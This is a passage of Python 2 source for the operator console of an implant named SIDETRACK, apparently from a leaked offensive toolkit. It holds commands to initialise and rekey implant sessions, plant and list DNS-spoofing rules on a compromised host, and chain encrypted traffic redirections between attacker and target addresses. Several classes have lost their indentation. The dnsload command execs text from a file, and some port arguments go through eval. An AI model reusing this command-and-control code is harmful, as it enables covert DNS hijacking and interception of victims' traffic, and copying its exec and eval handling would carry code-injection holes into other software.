                base.sessionDict[self.implant.session.name] = None
                return (1,"Canceled by user, target %s removed" % self.implant.session.name)
        sock.close()
        sock = None
        # Set the CC redirect to inactive. This will not effect the
        # current connection..only prevent the rule from getting in the way
        if prevRule != None:
            prevRule.set(0)
        #if there is a connection back return 1 else 0
        if self.implant.protocol.sock:
            cmd = self.implant.session.GetCommand("init")
            res = cmd.run()
            # remove the temporary redirect
            if tempRule != None:
                tempRule.remove()
            # remove the connection rule
            base.redir.delete(rule)
            if res[0] == 0:
                return res
            else:
                sys.stderr.write("%s\n"%(res[1]))
            return (1, "Connected")
        else:
            # remove the temporary redirect
            if tempRule != None:
                tempRule.remove()
            # remove the connection rule
            base.redir.delete(rule)
            return (0, "Could not connect")
##########################################################################
# INIT class
# op code: 0x20
#########################################################################
class SIDECMD_INIT(SIDECMD):
    """Bring a freshly-connected session up: ping, rekey, switchkey, status."""

    def __init__(self):
        SIDECMD.__init__(self)
        self.name = "init"
        self.usage = "init"
        self.info = "Initialize the implant"

    def run(self):
        msg = echocmd.ECHOCMD.run(self)
        if msg != None:
            return (0, msg)

        def step(cmdname):
            # Run one sub-command and hand back its (status, text) result.
            return self.implant.session.GetCommand(cmdname).run()

        res = step("ping")
        if res[0] == 0:
            return res
        sys.stderr.write("%s\n" % (res[1]))
        # rekey may need several tries; stop as soon as one succeeds.
        for attempt in range(3):
            res = step("rekey")
            if res[0] != 0:
                break
        if res[0] == 0:
            return res
        sys.stderr.write("%s\n" % (res[1]))
        res = step("switchkey")
        if res[0] == 0:
            return res
        sys.stderr.write("%s\n" % (res[1]))
        res = step("status")
        if res[0] == 0:
            return res
        sys.stderr.write("%s\n" % (res[1]))
        return (1, "Initialization complete")
##########################################################################
# DNSREAD class
#########################################################################
class SIDECMD_DNSLOAD(SIDECMD):
    """Replay a saved dns rule file (the format written by dnssave).

    Each input line is either "rule ..." (SIDECMD_DNSADD), "set ..."
    (SIDECMD_DNSSET) or an action line (SIDECMD_DNSACTION); arguments are
    re-quoted and the call is rebuilt as python source and exec'd.
    NOTE(review): exec of file-derived text means a crafted rule file can
    run arbitrary python inside this process -- load trusted files only.
    """
    def __init__(self):
        SIDECMD.__init__(self)
        self.name = "dnsload"
        self.usage = "dnsload <filename>"
        self.info = "Send DNS data from a file to the target"
    #-------------------------------------------------------------------------
    # Name : ProcessArg
    # Purpose: Tests to see if the argument is a string or number
    # Receive: arg - The argument to test
    # Return : The original string if a number, or a quoted string if not
    #-------------------------------------------------------------------------
    def ProcessArg(self,arg):
        # Decimal (optionally signed/fractional) and hex literals stay bare;
        # anything else is wrapped in double quotes for the exec'd call.
        if (re.match('^-?[0-9]*(\.[0-9]+)?$',arg) != None or \
            re.match('^0x[0-9a-fA-F]+L?', arg) != None):
            return arg
        else:
            return '"' + arg + '"'
    def runRule(self, args):
        # "rule <args...>" -> SIDECMD_DNSADD.run(<args...>)
        cmd = SIDECMD_DNSADD()
        cmd.implant = self.implant
        argString = 'myRes = cmd.run('
        for i in range(1,len(args)):
            if i == 1:
                argString = argString + self.ProcessArg(args[i])
            else:
                argString = argString + ", " + self.ProcessArg(args[i])
        argString = argString + ')'
        print argString
        exec(argString)
        # Remember the implant-assigned rule number so the following
        # set/action lines can reference it.
        if myRes and myRes[0]:
            self.lastRule = myRes[0]
    def runSet(self, args):
        # "set <state>" -> SIDECMD_DNSSET.run(lastRule, <state>)
        cmd = SIDECMD_DNSSET()
        cmd.implant = self.implant
        argString = 'myRes = cmd.run(self.lastRule'
        for i in range(1,len(args)):
            argString = argString + ", " + self.ProcessArg(args[i])
        argString = argString + ')'
        print argString
        exec(argString)
    def runCmd(self, args):
        # Any other line -> SIDECMD_DNSACTION.run(lastRule, <args...>)
        cmd = SIDECMD_DNSACTION()
        cmd.implant = self.implant
        argString = 'tmp = cmd.run(self.lastRule'
        for i in range(len(args)):
            argString = argString + ", " + self.ProcessArg(args[i])
        argString = argString + ')'
        print argString
        exec(argString)
    def run(self, filename):
        """Stream the file line by line; '#' lines and blanks are skipped."""
        msg = echocmd.ECHOCMD.run(self)
        if msg != None:
            return (0,msg)
        file = open(filename,'r')
        self.lastRule = 0
        while 1:
            line = file.readline()
            if not line:
                line = None
                return (1, "Input from file complete")
            args = base.SplitCommandString(string.strip(line))
            if len(args) == 0:
                continue
            elif args[0][0:1] == '#' or args[0] == '':
                continue
            elif args[0] == "rule":
                self.runRule(args)
                print "Rule %d added\n" % (self.lastRule)
            elif args[0] == "set":
                self.runSet(args)
            else:
                self.runCmd(args)
        return (0, "problem")
##########################################################################
# DNSADD class
# op code: 0x18
#########################################################################
class SIDECMD_DNSADD(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "dnsadd"
self.usage = "dnsadd <from ip> <from mask> <longevity> <type> <class> <name> [dns flags]"
self.info = "Add a DNS entry into sidetrack (see also dnsset)"
self.op = 0x18L
def run(self,ip,mask,length,rtype,rclass,name,flags=0x0080L):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
ipStr = self.ConvertIP(ip)
maskStr = self.ConvertIP(mask)
rtype = self.ConvertType(rtype)
rclass = self.ConvertClass(rclass)
name = self.ConvertName(name)
length = self.ConvertTime(length)
self.data = ipStr + maskStr + struct.pack("!LHHHH",length,flags,\
rtype,rclass,len(name)) +name
self.Query()
if( self.op == 0x18L and self.res == 0x1L ):
dnsRes = struct.unpack("!l",self.data[0:4])[0]
return (dnsRes, "Add successful, rule number: %d" % dnsRes)
else:
return (0, "Add failed")
##########################################################################
# DNSREMOVE class
# op code: 0x19
#########################################################################
class SIDECMD_DNSREMOVE(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "dnsrm"
self.usage = "dnsrm <rule|all>"
self.info = "Remove a dns rule"
self.op = 0x19L
def run(self,rule):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if type(rule) == type("a") and string.upper(rule)[:1] == 'A':
rule = 0
self.data = struct.pack("!l",rule)
self.Query()
if self.op == 0x19L and self.res == 0x01L:
return (1,"Rule(s) removed")
else:
return (0,"unable to remove rule(s)")
##########################################################################
# DNSSET class
# op code: 0x20
#########################################################################
class SIDECMD_DNSSET(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "dnsset"
self.usage = "dnsset <rule> <ignore|count|active>"
self.info = "Turn a DNS rule on or off"
self.op = 0x20L
def run(self,rule,onoff):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
self.data = struct.pack("!l",rule)
if onoff[0:1] == "a" or onoff[0:1] == "A":
self.data = self.data + struct.pack("!h", 2)
elif onoff[0:1] == "c" or onoff[0:1] == "C":
self.data = self.data + struct.pack("!h", 1)
else:
self.data = self.data + struct.pack("!h", 0)
self.Query()
if self.op == 0x20L and self.res == 0x01L:
return (1,"rule %d successfully set to %s" %\
(rule, onoff))
else:
return (0,"unable to set rule to %s" % onoff)
##########################################################################
# DNSRAW class
# op code: 0x21
#########################################################################
class SIDECMD_DNSRAW(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "dnsraw"
self.info = "Upload a binary dns response packet"
self.usage = "dnsraw <rule> <filename>"
self.op = 0x21L
def run(self, rule, filename):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0, msg)
file = open(filename,'r')
file.seek(0,2)
filesize = file.tell()
file.seek(0,0)
maxchunksize = self.implant.packetSize - 34
numchunks = filesize / maxchunksize
if filesize%maxchunksize > 0:
numchunks = numchunks + 1
for i in range(numchunks):
self.data = file.read(maxchunksize)
self.data = struct.pack("!LHHHH",rule,i,numchunks,4,\
len(self.data)) + self.data
self.Query()
if (self.op != 0x21L or self.res != 0x1L):
return (0,"Binary upload failed at chunk %d"%(i+1))
return (1,"Binary upload of %d chunks successful"%(numchunks))
##########################################################################
# DNSACTION class
# op code: 0x21
#########################################################################
class SIDECMD_DNSACTION(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "dnsaction"
self.info = "Set the action for a rule"
self.usage = "dnsaction <rule> <ans|auth|add> <name> <type> <class> <ttl> <data>"
self.op = 0x21L
def run(self,rule,sect,name,rtype,rclass,ttl,data):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
name = self.ConvertName(name)
sect = self.ConvertSection(sect)
rtype = self.ConvertType(rtype)
rclass = self.ConvertClass(rclass)
ttl = self.ConvertTime(ttl)
if rtype == 1:
data = self.ConvertIP(data)
else:
data = self.ConvertName(data)
self.data = struct.pack("!LLHHHHH", rule, ttl, sect, rtype,\
rclass,\
len(name),\
len(data))+\
name+data
self.Query()
if self.op == 0x21L and self.res == 0x01L:
return (1,"%s action for rule %d set successfully" % \
(sect, rule))
else:
return (0,"Could not set action")
##########################################################################
# DNSLIST class
# op code: 0x22
#########################################################################
class SIDECMD_DNSLIST(SIDECMD):
    """Fetch and pretty-print dns rules from the implant (opcode 0x22).

    Also the base class for dnssave, which overrides the string-building
    methods to emit the dnsload file format instead.
    """
    def __init__(self):
        SIDECMD.__init__(self)
        self.name = "dnslist"
        self.usage = "dnslist [-v] [rule] [section]"
        self.info = "Retrieve a section of a rule from SIDETRACK"
        self.op = 0x22L
    def ParseReturn(self):
        """Unpack the implant's reply into attributes.

        Pre-2.0 implants use a 48-byte header without the last source
        port; 2.0+ adds lastport and reorders dnsflags/ttl.
        """
        if self.implant.version < 2.0:
            self.lastport = 0
            (self.retVal, self.rule, self.fromIP, self.fromMask, self.longevity,\
             self.lastIP, self.lastTime, self.seen, self.flag, self.ttl, \
             self.dnsflags, self.rtype, self.rclass, self.rsec, \
             self.nlen, self.dlen) =\
             struct.unpack("!lLLLLLLHHLHHHHHH", self.data[0:48])
            self.dnsname = self.data[48:48+(self.nlen)]
            self.dnsdata = self.data[48+(self.nlen):48+(self.nlen)+(self.dlen)]
        else:
            (self.retVal, self.rule, self.fromIP, self.fromMask, self.longevity,\
             self.lastIP, self.lastTime, self.seen, self.flag, self.lastport, \
             self.dnsflags, self.ttl, self.rtype, self.rclass, self.rsec, \
             self.nlen, self.dlen) =\
             struct.unpack("!lLLLLLLHHHHLHHHHH", self.data[0:50])
            self.dnsname = self.data[50:50+(self.nlen)]
            self.dnsdata = self.data[50+(self.nlen):50+(self.nlen)+(self.dlen)]
    def GetRuleString(self):
        """Format the rule header: id, source/mask, state, expiry, then a
        hit-count line with the last querier and time (skew-corrected)."""
        printOut = "%10d %s/%s %-7s %s\n" % \
                   (self.rule,
                    self.ConvertToDot(self.fromIP),
                    self.ConvertToDot(self.fromMask),
                    self.FlagConvert(self.flag),
                    time.ctime(self.longevity+self.implant.timediff)[4:])
        printOut = printOut + "  %5s: %-5d %s:%d %s\n" %\
                   ("count",
                    self.seen,
                    self.ConvertToDot(self.lastIP),
                    self.lastport,
                    time.ctime(self.lastTime + self.implant.timediff))
        return printOut + self.GetSectionString()
    def GetRule(self,rule,sec=0):
        """Query one rule/section directly by rule number."""
        sec = self.ConvertSection(sec)
        #print "Getting section %d of rule %d\n" % (sec,rule)
        self.data = struct.pack("!LLH",rule,0,sec)
        self.Query()
        if self.op == 0x22L and self.res == 0x01L:
            self.ParseReturn()
            printOut = self.GetRuleString()
            return (1, printOut)
        else:
            return (0,"Error receiving result\n")
    def GetNextRule(self,lastRule,sec=0):
        """Iterate: fetch the rule after lastRule.

        Returns (next_rule_number, text); -1 means the listing is done
        (retVal 2 from the implant means there were no rules at all).
        """
        sec = self.ConvertSection(sec)
        print "Getting section %d of rule after %d\n" % (sec,lastRule)
        self.data = struct.pack("!LLH",0,lastRule,sec)
        self.Query()
        if self.op == 0x22L and self.res == 0x01L:
            self.ParseReturn()
            if self.retVal == 0:
                lastRule = self.rule
            elif self.retVal == 2:
                lastRule = -2
            else:
                lastRule = -1
            if lastRule == -2:
                lastRule = -1
                printOut = 'There are currently no rules'
            else:
                printOut = self.GetRuleString()
            return (lastRule, printOut)
        elif lastRule == 0:
            print self.res
            return (0,"There are currently no rules!")
        else:
            return (0,"Error receiving result\n")
    def GetSectionString(self):
        """Format one section line (section/type/class/ttl) followed by the
        decoded name and data; falls back to hex dumps on binary names."""
        printOut = "  %5s: %-5s %-3s %-5d " % \
                   (self.SectionConvert(self.rsec),
                    self.TypeConvert(self.rtype),
                    self.ClassConvert(self.rclass),
                    self.ttl&0xffffffL)
        if self.nlen:
            try:
                printOut = printOut + "%s\n" % \
                           (self.NameConvertName(self.dnsname))
            except:
                printOut = printOut + "\n N: %s\n" %\
                           (self.HexConvert(self.dnsname,10))
        if self.dlen:
            if self.rtype == 1 and self.dlen == 4:
                printOut = printOut + \
                           " D: %s\n" % \
                           (self.ConvertToDot(self.dnsdata))
            else:
                printOut = printOut + \
                           " D: %s\n" %\
                           (self.NameConvert(self.dnsdata,10))
        return printOut
    def GetSection(self,rule,section):
        """Fetch one section of a rule; section id 4 means 'empty'."""
        print "Getting section %d of rule %d\n" % (section,rule)
        self.data = struct.pack("!LLH",rule,0,section)
        self.Query()
        if self.op == 0x22L and self.res == 0x01L:
            self.ParseReturn()
            if self.rsec == 4:
                return (1, '')
            return (1,self.GetSectionString())
        else:
            return (0, "Could not get section")
    def preRuleString(self):
        # Separator printed before each rule (dnssave overrides this).
        return "-----------------------------------------------------------------------\n"
    def postRuleString(self):
        # Trailer printed after each rule (dnssave overrides this).
        return ''
    def runAll(self):
        """Walk every rule, emitting all four sections for each."""
        moreRules = 1
        lastRule = 0
        printOut = ''
        while moreRules:
            res = self.GetNextRule(lastRule)
            if res[0] == 0:
                return res
            elif res[0] == -1:
                moreRules = 0
                lastRule = self.rule
            else:
                lastRule = res[0]
            printOut = printOut + self.preRuleString()
            printOut = printOut + res[1]
            for i in range(1,4):
                sec = self.GetSection(lastRule, i)
                if sec[0] == 0:
                    return (0, printOut)
                printOut = printOut + sec[1]
            printOut = printOut + self.postRuleString()
        return (1, printOut)
    def run(self,rule=-1, sec=-1, ext=-1):
        """Dispatch on the argument forms:
        no args -> brief listing of every rule; "-v" -> verbose listing
        (all sections); "-v <rule> [<sec>]" / "<rule> [<sec>]" -> one rule.
        """
        msg = echocmd.ECHOCMD.run(self)
        if msg != None:
            return (0,msg)
        if rule == -1:
            lastRule = 0
            moreRules = 1
            printOut = ''
            while moreRules:
                res = self.GetNextRule(lastRule)
                if res[0] == 0:
                    return res
                elif res[0] == -1:
                    moreRules = 0
                    lastRule = self.rule
                else:
                    lastRule = res[0]
                printOut = printOut + res[1]
        elif rule == "-v":
            if sec == -1:
                return self.runAll()
            else:
                if ext == -1:
                    res = self.GetRule(sec)
                    if res[0] == 0:
                        return res
                    printOut = res[1]
                    for i in range(1,4):
                        sd = self.GetSection(sec, i)
                        if sd[0] == 0:
                            return (0, printOut)
                        printOut = printOut + sd[1]
                else:
                    return self.GetRule(sec,ext)
        else:
            if sec == -1:
                return self.GetRule(rule)
            else: # Rule != 0 and sec != -1
                return self.GetRule(rule,sec)
        return (1,printOut)
##########################################################################
# DNSREAD class
#########################################################################
class SIDECMD_DNSSAVE(SIDECMD_DNSLIST):
def __init__(self):
SIDECMD_DNSLIST.__init__(self)
self.name = "dnssave"
self.usage = "dnssave [rule] [filename]"
self.info = "Save one of more rules"
def ToOct(self, data):
if type(data) == type(0x0L) or type(data) == type(0):
ret = ''
if data > 255:
if data > 65535:
if data > 16777215:
ret = ret + "\\%o" % ((int)(data/16777216)&0xffL)
ret = ret + "\\%o" % ((int)(data/65536)&0xffL)
ret = ret + "\\%o" % ((int)(data/256)&0xffL)
ret = ret + "\\%o" % (data & 0xffL)
else:
reg = regex.compile("^[a-zA-Z0-9-_.]*$")
ret = ''
for i in range(len(data)):
if reg.match(data[i:i+1]) != None:
ret = ret + data[i:i+1]
else:
ret = ret + "\\%o" % \
struct.unpack("!H",'\000'+data[i:i+1])[0]
return '"' + ret + '"'
def NameConvertName(self, name):
reg = regex.compile("^[a-zA-Z0-9-_.]*$")
ret = ''
sp = 0
if type(name) != type(0):
while name[sp:sp+1] != '\000':
namelen = struct.unpack("!H",'\000' + name[sp:sp+1])[0]
#print namelen
if sp != 0:
ret = ret + '.'
for i in range(1,namelen+1):
if reg.match(name[sp+i:sp+i+1]) != None:
ret = ret + name[sp+i:sp+i+1]
else:
raise TypeError, self.ToOct(name)
sp = sp+1+namelen
return ret
def NameConvert(self, name, padding=0):
try:
return self.NameConvertName(name)
except:
return self.ToOct(name)
def GetSectionString(self):
printOut = "%s %s %s %s %d " % \
(self.SectionConvert(self.rsec),
self.NameConvert(self.dnsname),
self.TypeConvert(self.rtype),
self.ClassConvert(self.rclass),
self.ttl&0xffffffL)
if self.dlen:
if self.rtype == 1 and self.dlen == 4:
printOut = printOut + self.ConvertToDot(self.dnsdata)
else:
printOut = printOut + self.NameConvert(self.dnsdata,10)
return printOut + '\n'
def GetRuleString(self):
printOut = "rule %s %s %d %s %s %s 0x%04x\n" % \
(self.ConvertToDot(self.fromIP),
self.ConvertToDot(self.fromMask),
self.longevity - self.rule,
self.TypeConvert(self.rtype),
self.ClassConvert(self.rclass),
self.NameConvert(self.dnsname),
self.dnsflags)
return printOut
def preRuleString(self):
return "# -----------------------------------------------------------------------\n"
def postRuleString(self):
return "set %s\n" % (self.FlagConvert(self.flag))
def run(self,rule=-1, file=-1):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if rule == -1: # All Rules to stdout
return self.runAll()
elif type(rule) == type(''): # All rules to file
out = open(rule,'w')
res = self.runAll()
if res[0] == 0:
return res
out.write(res[1])
out = None
return res
elif file == -1: # Single rule to stdout
res = self.GetRule(rule)
if res[0] == 0:
return res
printOut = res[1]
for i in range(1,4):
sd = self.GetSection(rule,i)
if sd[0] == 0:
return (0,printOut + sd[1])
printOut = printOut + sd[1]
return (1,printOut + self.postRuleString())
else: # Single rule to file
out = open(file,"w")
res = self.GetRule(rule)
if res[0] == 0:
return res
printOut = res[1]
for i in range(1,4):
sd = self.GetSection(rule,i)
if sd[0] == 0:
return (0,printOut + sd[1])
printOut = printOut + sd[1]
printOut = printOut + self.postRuleString()
out.write(printOut)
out = None
return (1,printOut)
#############################################################################
# REDIRADD class
# opcode 0x23
#############################################################################
class SIDECMD_REDIRADD(SIDECMD):
    """Build and install a traffic-redirection rule (opcode 0x23).

    Parses the attacker/target host:port specifications and the option
    flags, generates per-rule randomness (ident, munge value, crypto key,
    TCP sequence), then hands everything to a REDIRECT object to add.
    """
    def __init__(self):
        SIDECMD.__init__(self)
        self.name = "rediradd"
        self.usage = "rediradd <protocol | all> <host_A> <host_B> [-insert <rule>]\n [-ttl (reset | <num>)] [-nocrypto] [-afix] [-tfix] [-samesum]\n [-longevity <time>] [-conntimeout <time>]\n\n <host_A>/<host_B> format: <ip_address>[:<local_port>/<remote_port>]\n"
        self.info = "Add a REDIRECT rule into SIDETRACK's rule set"
        self.op = 0x23L
    def parseProto(self,proto):
        """Map a protocol name to its IP protocol number.

        tcp->6, udp->17, icmp->1, all->0; numeric input passes through.
        Raises ValueError on anything else.
        """
        origproto = proto
        if type(proto) == type ('a'):
            proto = string.upper(proto)[:1]
            if proto == "T":
                proto = 6
            elif proto == "U":
                proto = 17
            elif proto == "I":
                proto = 1
            elif proto == "A":
                proto = 0
            else:
                raise ValueError, origproto
        return proto
    def parseHostInfo(self,host):
        """Split "<host>[:<lport>/<rport>]" into (session, packed_ip, lport, rport).

        <host> may be an IP or an existing session name (then the IP comes
        from that session's target).  A '*' port or a missing port pair
        yields -1, meaning "all ports".  Raises ValueError on bad syntax.
        """
        #split the ip from the ports
        res = string.split(host,":")
        if len(res) == 1:
            try:
                host = None
                ipaddr = self.ConvertIP(res[0])
            except:
                host = base.sessionDict[res[0]]
                ipaddr = self.ConvertIP(host.target.GetIP())
            return host,ipaddr,-1,-1
        elif len(res) == 2:
            ports = string.split(res[1],"/")
            if len(ports) != 2:
                raise ValueError, host
            if ports[0] == "*":
                ports[0] = -1
            else:
                ports[0] = eval(ports[0])
            if ports[1] == "*":
                ports[1] = -1
            else:
                ports[1] = eval(ports[1])
            try:
                host = None
                ipaddr = self.ConvertIP(res[0])
            except:
                host = base.sessionDict[res[0]]
                ipaddr = self.ConvertIP(host.target.GetIP())
            return host,ipaddr,ports[0],ports[1]
        else:
            raise ValueError, host
    def run(self,protocol,attacker,target,
            opt0=None,opt1=None,opt2=None,opt3=None,opt4=None,opt5=None,
            opt6=None,opt7=None,opt8=None,opt9=None,first=1):
        """Install the rule; 'first' is cleared on recursive calls when
        the rule is being chained through an upstream SIDETRACK hop."""
        msg = echocmd.ECHOCMD.run(self)
        if msg != None:
            return (0,msg,0)
        optList = [opt0,opt1,opt2,opt3,opt4,opt5,opt6,opt7,opt8,opt9]
        # Defaults: 4h lifetimes, addr/ttl fixups on, munge on (crypto on
        # only for the first hop).
        allProtoAT = 0
        allProtoTA = 0
        allRedir = 0
        ttl_reset = 1
        ttl_mod = 0
        munge = 1
        encrypt = 0
        afix = 1
        tfix = 1
        ident = 0
        seq = 0
        insert = 0
        samesum = 0
        longevity = 14400
        conn_to = 14400
        cmd = None
        localredir = 0
        if first:
            munge = 0
            encrypt = 1
        protocol = self.parseProto(protocol)
        if protocol == 0:
            allRedir = 1
        host,A_ip,A_port,SA_port = self.parseHostInfo(attacker)
        host2,T_ip,T_port,ST_port = self.parseHostInfo(target)
        # Attacker side referenced another session: recursively install the
        # matching rule on that upstream hop first.
        if host != None:
            hpn = host.implant.parent.name
            myname = host.name
            attacker = re.sub(myname,hpn,attacker)
            cmd = host.GetCommand('rediradd')
            res = cmd.run(protocol,attacker,\
                          "%s:%d/%d"%(self.implant.session.target.ip,SA_port,A_port),\
                          opt0,opt1,opt2,opt3,opt4,opt5,opt6,opt7,opt8,opt9,0)
            if res[0] == 0:
                return res
            if res[2] != 0 and cmd.implant.session.target.hasAnotherAddress == 1:
                A_ip = struct.pack("!L",res[2])
        # A wildcard on one side must be matched by a wildcard on the
        # corresponding far-side port.
        if SA_port == -1 and T_port != -1:
            base.db(1,"problem")
            raise ValueError, "Invalid ports"
        if SA_port != -1 and T_port == -1:
            base.db(1,"problem")
            raise ValueError, "Invalid ports"
        if ST_port == -1 and A_port != -1:
            base.db(1,"problem")
            raise ValueError, "Invalid ports"
        if ST_port != -1 and A_port == -1:
            base.db(1,"problem")
            raise ValueError, "Invalid ports"
        if SA_port == -1 and T_port == -1:
            allProtoAT = 1
            SA_port = 0
            T_port = 0
        if ST_port == -1 and A_port == -1:
            allProtoTA = 1
            ST_port = 0
            A_port = 0
        # Parse the args
        i=0
        while i < len(optList):
            if optList[i] == None:
                break
            elif string.upper(optList[i])[:3] == '-TT':
                # -ttl: "reset", a signed "+n"/"-n" adjustment, or an int.
                i = i+1
                if type(optList[i]) == type(1):
                    ttl_mod = optList[i]
                    if optList[i] < 0:
                        ttl_reset = 0
                    else:
                        ttl_reset = 1
                elif string.upper(optList[i])[:1] == 'R':
                    ttl_mod = 0
                    ttl_reset = 1
                elif optList[i][0] == '+' or optList[i][0] == '-':
                    ttl_mod = eval(optList[i])
                    ttl_reset = 0
                else:
                    raise ValueError, optList[i]
                #if ttl_reset == 0:
                #    ttl_mod = struct.pack("!H",ttl_mod)
                #else:
                #    ttl_mod = struct.pack("!h",ttl_mod)
            elif string.upper(optList[i])[:2] == '-I':
                i = i+1
                insert = optList[i]
            elif string.upper(optList[i])[:2] == '-L':
                i = i+1
                longevity = self.ConvertTime(optList[i])
            elif string.upper(optList[i])[:2] == '-C':
                i = i+1
                conn_to = self.ConvertTime(optList[i])
            elif string.upper(optList[i])[:2] == '-N':
                munge = 0
                encrypt = 0
            elif string.upper(optList[i])[:2] == '-E':
                encrypt = 1
            elif string.upper(optList[i])[:2] == '-A':
                afix = 0
            elif string.upper(optList[i])[:3] == '-TF':
                tfix = 0
            elif string.upper(optList[i])[:2] == '-S':
                samesum = 1
            else:
                raise ValueError, optList[i]
            i = i + 1
        # Rule terminating at this implant's own target: plain local
        # redirect, no transforms.
        if T_ip == self.ConvertIP(self.implant.session.target.ip):
            encrypt = 0
            munge = 0
            localredir = 1
        # Flag word bit layout (bit 0 always set): 1 afix, 2 tfix,
        # 3 ttl_reset, 4 encrypt, 5 munge, 6 all-protocols, 7/8 all-ports
        # (A->T / T->A), 9 C&C support, 10 same checksum.
        flags = 1 | afix << 1 | tfix << 2 | ttl_reset << 3 \
                | encrypt << 4 | munge << 5 | allRedir << 6 | allProtoAT << 7 \
                | allProtoTA << 8 | base.ccSupport << 9 | samesum << 10
        # Randomize the per-rule parameters (IP ident, munge constant,
        # 128-bit key, TCP ISN) for non-local rules.
        rd = crypto.GetRandom()
        if localredir == 0:
            ident = struct.unpack("!H",rd[0:2])[0]
        if munge:
            munge = struct.unpack("!L",rd[2:6])[0]
            # Munge value must be odd and its low byte must not be 1.
            if munge & 1L == 0:
                munge = munge + 1
            if munge & 0xffL == 1:
                munge = munge + 10
        if protocol == 6 and localredir == 0 and encrypt:
            seq = struct.unpack("!L", rd[22:26])[0]
        if encrypt:
            encrypt = struct.unpack("!LLLL",rd[6:22])
        else:
            encrypt = (0,0,0,0)
        base.db(2, seq)
        base.db(2, ident)
        self.redir =REDIRECT(self,insert,longevity,conn_to,protocol,A_ip,T_ip,\
                             ident,seq,munge,encrypt,ttl_mod,flags,\
                             A_port,SA_port,T_port,ST_port)
        ruleRes = self.redir.add()
        # Link this rule to the upstream hop's rule so teardown can walk
        # the chain.
        if ruleRes[0] and cmd != None:
            if cmd.redir != None:
                cmd.redir.next = self.redir
                self.redir.prev = cmd.redir
        return ruleRes
#############################################################################
# REDIRLIST class
# opcode 0x24
#############################################################################
class SIDECMD_REDIRLIST(SIDECMD):
    """Implant command: list redirect rule entries (opcode 0x24).

    Queries the implant for one rule (``redirlist <rule>``) or iterates
    over all rules, decoding each fixed-width binary record into a
    human-readable summary line.
    """
    def __init__(self):
        SIDECMD.__init__(self)
        self.name = "redirlist"
        self.usage = "redirlist [rule]"
        self.info = "List redirect entries."
        self.op = 0x24L
    def parseReturn(self):
        """Decode one redirect-rule record from the raw reply in self.data.

        The record is big-endian and fixed-width; one-byte fields are
        widened to 16 bits by prepending a NUL before struct.unpack.
        """
        self.ret, self.rule, self.longevity, self.conn_to, \
          self.A_ip, self.T_ip, self.flags = \
          struct.unpack("!LLLLLLH",self.data[:26])
        self.ttl_mod = struct.unpack("!H",'\000'+self.data[26:27])[0]
        self.protocol = struct.unpack("!H", '\000'+self.data[27:28])[0]
        self.conns, self.ATcount, self.TAcount, self.seen, self.munge, \
           self.A_port, self.SA_port, self.T_port, self.ST_port, \
           self.seq = struct.unpack("!LLLLLHHHHL",self.data[28:60])
        self.A_ip = self.ConvertToDot(self.A_ip)
        self.T_ip = self.ConvertToDot(self.T_ip)
        # timediff is presumably the implant/operator clock offset — the
        # expiry time is shifted into local time before formatting.
        self.longevity = time.ctime(self.longevity-self.implant.timediff)[4:]
        # Map the IP protocol number to a display name; unknown protocols
        # are shown numerically.
        if self.protocol == 1:
            self.protocol = "ICMP"
        elif self.protocol == 6:
            self.protocol = "TCP"
        elif self.protocol == 17:
            self.protocol = "UDP"
        elif self.protocol == 0:
            self.protocol = "ALL"
        else:
            self.protocol = eval("'%d'" % (self.protocol))
        # Flag bits mirror the layout built by rediradd:
        # 0x1 active, 0x2 afix, 0x4 tfix, 0x8 ttl_reset, 0x10 encrypt,
        # 0x20 munge, 0x40 allRedir, 0x80 allProtoAT, 0x100 allProtoTA,
        # 0x400 samesum.
        if (self.flags & 0x1L):
            self.active = "ACTIVE"
        else:
            self.active = "INACTIVE"
        self.opts = ''
        if not (self.flags & 0x2L):
            self.opts = self.opts + '-afix '
        if not (self.flags & 0x4L):
            self.opts = self.opts + '-tfix '
        if (self.flags & 0x400L):
            self.opts = self.opts + '-samesum '
        if self.flags & 0x8L:
            if self.ttl_mod == 0:
                self.opts = self.opts + '-ttl reset '
            else:
                self.opts = self.opts + '-ttl %d ' % (self.ttl_mod)
        else:
            # Relative TTL adjustment: values above 127 are negative
            # deltas stored in two's complement within one byte.
            if self.ttl_mod > 127:
                self.opts = self.opts + '-ttl %d' % (self.ttl_mod-256)
            else:
                self.opts = self.opts + '-ttl +%d ' % (self.ttl_mod)
        if not (self.flags & 0x30L):
            self.opts = self.opts + '-nocrypto '
    def outputPorts(self,attacker,flags,ip,lport,rport):
        """Format one endpoint as ip[:lport/rport], masking wildcards.

        When the rule redirects all protocols (0x40) or both directions
        are protocol-wildcarded (0x180), only the IP is shown; otherwise
        the wildcarded side's port is replaced with '*'.
        """
        if flags & 0x40 or flags & 0x180 == 0x180:
            return ip
        if attacker and flags & 0x80:
            rport = '*'
        if attacker and flags & 0x100:
            lport = '*'
        if not attacker and flags & 0x80:
            lport = '*'
        if not attacker and flags & 0x100:
            rport = '*'
        if type(lport) != type('*'):
            lport = '%d' %(lport)
        if type(rport) != type('*'):
            rport = '%d' %(rport)
        return '%s:%s/%s' % (ip,lport,rport)
    def outputCurrent(self):
        """Render the most recently parsed rule as a multi-line summary."""
        res = '%-5d %s Connection timeout: %s Expires: %s\n' % \
              (self.rule,self.active,\
               self.TimeConvert(self.conn_to),self.longevity)
        res = res + '   %s %s %s %s\n' % \
              (self.protocol,
               self.outputPorts(1,self.flags,self.A_ip,self.A_port,self.SA_port),
               self.outputPorts(0,self.flags,self.T_ip,self.T_port,self.ST_port),
               self.opts)
        res = res + '   Connections: %-4d Last seen %s\n   A->T count: %-6d T->A count: %-6d\n' % (self.conns, time.ctime(self.seen-self.implant.timediff)[4:], self.ATcount, self.TAcount)
        return (1, res)
    def listOne(self,rule):
        """Query and format a single rule by number."""
        self.data = struct.pack("!LL",rule,0)
        self.Query()
        if self.op == 0x24L and self.res == 0x01L:
            self.parseReturn()
            return self.outputCurrent()
        else:
